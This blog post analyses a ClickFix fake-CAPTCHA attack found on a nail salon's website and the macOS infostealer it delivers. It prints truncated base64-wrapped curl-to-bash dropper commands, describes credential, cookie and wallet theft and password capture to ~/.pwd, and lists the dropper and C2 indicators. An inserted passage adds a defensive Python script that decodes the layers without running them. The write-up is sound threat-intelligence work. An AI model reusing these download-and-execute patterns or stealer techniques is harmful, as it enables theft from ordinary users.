ClickFix 💅🏼

Soooo when I go to Spain, I like to treat myself. One thing in particular is to get my nails done.

As I was preparing for my trip, I decided I’d book an appointment at the nail salon I usually go to. To my surprise, the website showed a weird page.

Discovery

(I can’t explain why I took a photo with my phone instead of a screenshot… I panicked ok???)

The page has instructions to prove you are not a robot, and to paste a command in your terminal…

I had heard of this phishing method before, and I immediately recognized it was malicious. I got so excited that I could investigate this.

The third instruction saying to “copy the command” using the copy button makes a normal user think they are copying the ‘I am not a robot’ text.

Don’t be fooled! That is NOT the text you are copying. Also, that command makes no sense btw. If you actually copied what they suggest into your terminal you’d get:

command not found: I

Anyway, the real command you were copying is this (I’m trimming the command):

echo "Y3VybCAtc0wgIiQoZWNobyAnYmx[..]" | base64 -d | bash

“AH! INTERESTING”, I thought.

This decodes to a curl to another base64 encoded string:

curl -sL "$(echo 'aHR0c[..]' | base64 -d)" | nohup bash

What’s happening here is they are downloading a file on your machine and executing it. That’s hella dangerous. You’d have NO idea if you weren’t in infosec or IT. But also, it happens so quickly, even if you did notice something weird, the script would start running.
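As an added example (my own, not code from the original post or from the campaign), here is a small Python triage script that peels the nested base64 layers of a ClickFix one-liner in memory, never executing any of them, and flags the download-and-execute pattern. The sample it builds mirrors the shape of the command above but uses a placeholder URL, not the real dropper.

```python
import base64
import re

# Decoded layers that pipe into a shell or fetch something remote.
DANGEROUS = re.compile(r"\|\s*(?:nohup\s+)?(?:ba)?sh\b|\bcurl\b|\bwget\b")
# An `echo <base64> | base64 -d` fragment, which is what both layers on the page use.
B64_ARG = re.compile(r"(?:echo|printf)\s+['\"]?([A-Za-z0-9+/=]{8,})['\"]?\s*\|\s*base64\s+(?:-d|--decode)")
URL_RE = re.compile(r"https?://[^\s\"')]+")


def peel_layers(command, max_depth=5):
    """Return the command plus each successively decoded layer. Nothing is run;
    the base64 argument is decoded in memory and searched again."""
    layers = [command]
    current = command
    for _ in range(max_depth):
        m = B64_ARG.search(current)
        if not m:
            break
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:
            break  # not valid base64 (binascii.Error is a ValueError), stop peeling
        layers.append(decoded)
        current = decoded
    return layers


def triage(command):
    """Summarise a pasted command: how many layers it hides, the URLs that
    appear once decoded, and whether any layer downloads or executes code."""
    layers = peel_layers(command)
    urls = [u for layer in layers for u in URL_RE.findall(layer)]
    dangerous = any(DANGEROUS.search(layer) for layer in layers)
    return {"layers": len(layers), "urls": urls, "dangerous": dangerous}


def build_sample():
    """Constructed sample with the same shape as the post's command
    (echo <b64> | base64 -d | bash wrapping a curl whose URL is itself base64).
    The URL is a placeholder, not the real dropper address."""
    url = "https://dropper.example/payload.sh"
    inner_b64 = base64.b64encode(url.encode()).decode()
    inner = "curl -sL \"$(echo '%s' | base64 -d)\" | nohup bash" % inner_b64
    outer_b64 = base64.b64encode(inner.encode()).decode()
    return 'echo "%s" | base64 -d | bash' % outer_b64


if __name__ == "__main__":
    for i, layer in enumerate(peel_layers(build_sample())):
        print("layer %d: %s" % (i, layer))
    print(triage(build_sample()))
```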

The osascript that gets downloaded on your machine (and in particular for me, on MacOS) is an infostealer malware. It will steal browser passwords, cookies, crypto wallets, Keychain, Apple Notes, etc… It also spawns a dialog to trick the user into entering their password so it can run sudo commands.

It saves the password entered into ~/.pwd, so it can just read from that file whenever it performs privileged commands… silent re-infection.

First time I’m exposed to osascript; this is a hilarious scripting language.

This was most definitely written with AI, I mean who in their right mind would…idk..?

Anyways, it zips it all up and sends it to another server.

Also the “devs” weren’t quite done yet… still implementing a Ledger Live stealer, so they just commented it out.

So to sum up, we have the dropper (the curl to the malicious website which hosts the osascript), and the C2 (where our stolen info is sent to). Then, it deletes all traces.

Dropper: mekoilsuharum.com
C2 server: uterimoxis.com

The infrastructure

Okay so I’m not used to doing threat intel and so on, so this is what I have regarding the empire.

The attackers split their operation across two continents. The dropper (the server that hosts the malware script) was hosted in Europe. The C2 server, which receives the stolen data, was hosted in the United States under a small ISP in Michigan.

Small rural ISP in Michigan, FENTOOOOOOOON

Both domains were registered through Njalla, an anonymous registrar incorporated in Nevis, a small Caribbean island nation with minimal legal cooperation agreements. Njalla accepts cryptocurrency payments, requires no identity verification, and legally acts as the owner of record for all domains registered through them.

However, I did notify them and they were very quick to respond. I haven’t heard anything back from them, but I’d like to believe they took care of it.

The dropper and the C2

The dropper’s only job is to serve the malware script when a victim runs the curl command. It’s basically the delivery mechanism. The C2 is where the stolen data is zip’d and ship’d to.

They are independent by design. When the dropper was taken down, no new victims could be infected, but the C2 continued to collect data from machines that were already compromised.

As of writing, both the C2 and the dropper seem to be down (I might or might not have had something to do with this 🤷‍♀️).

Probing (lightly)

I kinda wanted to poke the bear and dig a bit deeper. To do this safely, I spun up a disposable DigitalOcean server.

I grabbed the authentication token from the osascript and attempted to make a POST request to the health endpoint /api/health. The C2 responded with:

  {"data":null,"success":true}

The server was indeed alive, authenticated, and ready to receive stolen data from victims. I also got information on the stack: OpenResty sitting in front of a Node.js Express backend, running HTTP/2 over TLS 1.3 with a Let’s Encrypt certificate issued just weeks earlier on March 24, 2026. This was a fresh operation.

I tried to dig deeper: fuzzing the API for hidden endpoints, hunting for an admin panel, probing subdomains. Nothing.

They are pros. No guessable paths, randomised URLs, and a panel that either didn’t exist publicly or was locked to their IP only. Either that, or skill issue on my side (most probable).

Conclusion

I didn’t set out to investigate a malware campaign. I panicked, took a photo with my phone like a grandma, and then got completely sucked into a rabbit hole that ended with me poking a live C2 server from a disposable VM in the cloud while eating lunch.

But that’s kind of the point. This attack wasn’t targeting security researchers. It was targeting normal people, people booking nail appointments, people who happen to own crypto, people who would see a “prove you’re not a robot” prompt and not think twice. The command makes no sense if you look closely, but most people don’t look closely. That’s the whole bet.

The takeaway is simple: never paste a command from a website into your terminal. It doesn’t matter how legitimate the page looks. No website on earth needs you to open Terminal to prove you’re human.

For me personally, this was a first real dive into threat intelligence and active infrastructure analysis. I made mistakes, learned a lot, and got surprisingly far for someone who just wanted a manicure 💅🏼.

The C2 is down now. The dropper is down. The nail salon is clean. And I got a fun set of nails.

IOC table

Type         Value
Domain       mekoilsuharum.com
Domain       uterimoxis.com
Domain       api.uterimoxis.com
Domain       gamma.api.uterimoxis.com
IP           213.177.179.52 (dropper)
IP           104.251.180.200 (C2)
HTTP header  X-Bid: f48fbe39836779cadbf148b5952919fd
File         /tmp/alego.zip
File         /tmp/stravy/ggwp
File         /tmp/stravy/user
File         /tmp/stravy/hardware
File         ~/.pwd
Directory    /tmp/stravy/
